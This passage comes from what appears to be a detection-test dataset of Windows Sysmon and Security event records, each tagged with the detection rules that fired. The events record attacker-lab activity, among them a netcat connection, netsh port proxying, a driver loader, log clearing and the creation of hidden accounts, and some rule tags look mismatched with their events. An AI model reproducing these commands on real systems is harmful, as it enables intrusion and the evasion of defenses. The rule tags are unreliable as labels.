Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 (WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution_attributes":{"ProcessID":2728,"ThreadID":3888},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution_attributes":{"ProcessID":5424,"ThreadID":5816},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-27 10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution_attributes":{"ProcessID":5400,"ThreadID":6548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["In-memory PowerShell"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution_attributes":{"ProcessID":1940,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107103","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769629,"Execution_attributes":{"ProcessID":584,"ThreadID":752},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:31:19.133272Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User Created"],"event":{"Event":{"EventData":{"AccountExpires":"%%1794","AllowedToDelegateTo":"-","DisplayName":"%%1793","HomeDirectory":"%%1793","HomePath":"%%1793","LogonHours":"%%1793","NewUacValue":"0x15","OldUacValue":"0x0","PasswordLastSet":"%%1794","PrimaryGroupId":"513","PrivilegeList":"-","ProfilePath":"%%1793","SamAccountName":"$","ScriptPath":"%%1793","SidHistory":"-","SubjectDomainName":"3B","SubjectLogonId":"0x3e7","SubjectUserName":"01566S-WIN16-IR$","SubjectUserSid":"S-1-5-18","TargetDomainName":"3B","TargetSid":"S-1-5-21-308926384-506822093-3341789130-107104","TargetUserName":"$","UserAccountControl":"\r\n\t\t%%2080\r\n\t\t%%2082\r\n\t\t%%2084","UserParameters":"%%1792","UserPrincipalName":"-","UserWorkstations":"%%1793"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":4720,"EventRecordID":769634,"Execution_attributes":{"ProcessID":584,"ThreadID":640},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider_attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"},"Security":null,"Task":13824,"TimeCreated_attributes":{"SystemTime":"2020-09-16T09:32:13.647155Z"},"Version":0}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.526","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\install.bat","UtcTime":"2019-03-17 20:17:44.526"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5252,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.537011Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.607","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPCheck.exe","UtcTime":"2019-03-17 20:17:44.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5253,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.637155Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:44.777","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPConf.exe","UtcTime":"2019-03-17 20:17:44.777"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5254,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:44.797385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 20:17:45.458","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-A965-5C8E-0000-0010D9100400","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\RDPWRA~1.2\\RDPWInst.exe","UtcTime":"2019-03-17 20:17:45.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":5255,"Execution_attributes":{"ProcessID":1852,"ThreadID":464},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-03-17T20:17:45.478364Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-03-17 